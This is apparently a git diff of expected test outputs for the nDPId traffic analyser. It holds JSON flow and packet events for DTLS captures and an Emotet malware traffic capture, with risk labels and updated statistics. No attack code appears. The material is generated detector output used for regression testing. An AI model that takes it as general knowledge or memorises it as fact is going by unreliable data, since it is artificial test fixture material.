+00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","packets-captured":91,"packets-processed":91,"total-skipped-flows":0,"total-l4-payload-len":34046,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1644251736135} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 91/91 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 34046 bytes +~~ total detected protocols..: 4 +~~ total active/idle flows...: 4/4 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6008896 bytes +~~ total memory freed........: 6008896 bytes +~~ total allocations/frees...: 120979/120979 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 475 chars +~~ json string max len.......: 2428 chars +~~ json string avg len.......: 1450 chars diff --git a/test/results/dtls_old_version.pcapng.out b/test/results/dtls_old_version.pcapng.out new file mode 100644 index 000000000..ab6b1beb7 --- /dev/null +++ b/test/results/dtls_old_version.pcapng.out 
@@ -0,0 +1,25 @@ +00469{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_old_version.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388130600} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388130600,"flow_last_seen":1592388130600,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388130600,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388130600,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1592388130600,"pkt":"AAAAAAAAAAYArvxgCABFAAB\/OTwAAH8Ri0ElvARzRkIGgNyFAbsAaxY5FgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEAXunqImL3nzdrUBZ\/BhfTQm46UvY\/Zrav40oHNoY96qUgA8IpvhXWIFFe7w7KCq\/byTjgCP7o8hqBpXIG\/Tdba9gAAAIANQEA"} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388130600,"flow_last_seen":1592388130600,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388130600,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388131604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1592388131604,"pkt":"AAAAAAAAAAYArvxgCABFAAB\/OUAAAH8Riz0lvARzRkIGgNyFAbsAaxY5FgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEAXunqImL3nzdrUBZ\/BhfTQm46UvY\/Zrav40oHNoY96qUgA8IpvhXWIFFe7w7KCq\/byTjgCP7o8hqBpXIG\/Tdba9gAAAIANQEA"} 
+00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388131689,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1592388131689,"pkt":"AAAAAAAAAAYArvxgCABFAABM6u4AAPIRZsFGQgaAJbwEcwG73IUAOKixFgEAAAAAAAAAAAAAIwMAABcAAAAAAAAAFwEAFJQvJfDCZcKI8kzWgOcHI1Oo1d90"} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592388130600,"flow_last_seen":1592388137817,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":700,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1592388137817,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592388130600,"flow_last_seen":1592388137817,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":700,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1592388137817,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"dtls_old_version.pcapng","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1592388137817} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 7/7 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 700 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6003327 bytes +~~ total memory freed........: 6003327 bytes +~~ total allocations/frees...: 120885/120885 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 474 chars +~~ json string max len.......: 886 chars +~~ json string avg len.......: 670 chars diff --git a/test/results/dtls_session_id_and_coockie_both.pcap.out b/test/results/dtls_session_id_and_coockie_both.pcap.out index bb554b208..fe621d97e 100644 --- a/test/results/dtls_session_id_and_coockie_both.pcap.out +++ b/test/results/dtls_session_id_and_coockie_both.pcap.out 
@@ -2,11 +2,11 @@ 00572{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388499775} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388499775,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1592388499775,"pkt":"AAAAAAAAAAEAvpsKCABFAAB\/T3sAAH8RdtO5xHHv33Rp98RRrZsAazO3Fv79AAAAAAAAAAAAVgEAAEoAAAAAAAAASv79P8FbOXt8ZkgBLvoC72ni+sdFNMYxwEb+hvs\/sv9L1B0gODIAL4OTx2HjtkquDfJ\/XJtXFrGeH36FJxKlpF5tST4AAALALAEA"} 
-01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": 
{"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388499786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1592388499786,"pkt":"AAAAAAAAAAcAwedSCABFAABMjnQAAPMRxAzfdGn3ucRx762bxFEAOGNSFv7\/AAAAAAAAAAAAIwMAABcAAAAAAAAAF\/7\/FBwO\/CFwEASeBoBTHTZO4F6qQqae"} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388499813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1592388499813,"pkt":"AAAAAAAAAAEAvpsKCABFAACTT3wAAH8Rdr65xHHv33Rp98RRrZsAf9dAFv79AAAAAAAAAAEAagEAAF4AAQAAAAAAXv79P8FbOXt8ZkgBLvoC72ni+sdFNMYxwEb+hvs\/sv9L1B0gODIAL4OTx2HjtkquDfJ\/XJtXFrGeH36FJxKlpF5tST4UHA78IXAQBJ4GgFMdNk7gXqpCpp4AAsAsAQA="} -01134{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"a1d48eca741e476d8ee735578a26bdbd","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -00949{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
+01134{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"a1d48eca741e476d8ee735578a26bdbd","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +00949{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": 
{"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1592388499833} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869567 bytes -~~ total memory freed........: 5869567 bytes -~~ total allocations/frees...: 118119/118119 +~~ total memory allocated....: 6003201 bytes +~~ total memory freed........: 6003201 bytes +~~ total allocations/frees...: 120881/120881 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 488 chars ~~ json string max len.......: 1139 chars diff --git a/test/results/emotet.pcap.out b/test/results/emotet.pcap.out index 4722a0603..3b3ac54d4 100644 --- a/test/results/emotet.pcap.out +++ b/test/results/emotet.pcap.out 
@@ -4,47 +4,46 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645830066121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1645830066121,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0wBJAAIAGPvkKAhlmwfwWVN\/dAkvNIWS2AAAAAIAC+vBkZgAAAgQFtAEDAwgBAQQC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645830066871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1645830066871,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsxzIAAIAGd+HB\/BZUCgIZZgJL392K6SffzSFkt2AS+vDaogAAAgQFtA=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645830066871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1645830066871,"pkt":"IOUqtpPxAAgCHEeuCABFAAAowBNAAIAGPwQKAhlmwfwWVN\/dAkvNIWS3iukn4FAQ+vDyXwAA"} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1645830066121,"flow_last_seen":1645830068348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1645830068348,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto 
on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1645830066121,"flow_last_seen":1645830074471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1289,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1645830074471,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":627,"packets-processed":626,"total-skipped-flows":0,"total-l4-payload-len":404645,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1648563468993} 
+00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1645830066121,"flow_last_seen":1645830068348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1645830068348,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":627,"packets-processed":626,"total-skipped-flows":0,"total-l4-payload-len":404645,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1648563468993} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648563468993,"flow_last_seen":1648563468993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648563468993,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648563468993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648563468993,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0EddAAIAG2c0KAx1laKF\/Ftv1AFBvd7IvAAAAAIAC+vBnEwAAAgQFtAEDAwgBAQQC"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1648563469109,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsoCoAAIAGi4JooX8WCgMdZQBQ2\/UuAEklb3eyMGAS+vAY8wAAAgQFtA=="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1648563469109,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoEdhAAIAG2dgKAx1laKF\/Ftv1AFBvd7IwLgBJJlAQ+vAwsAAA"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648563468993,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1648563469109,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
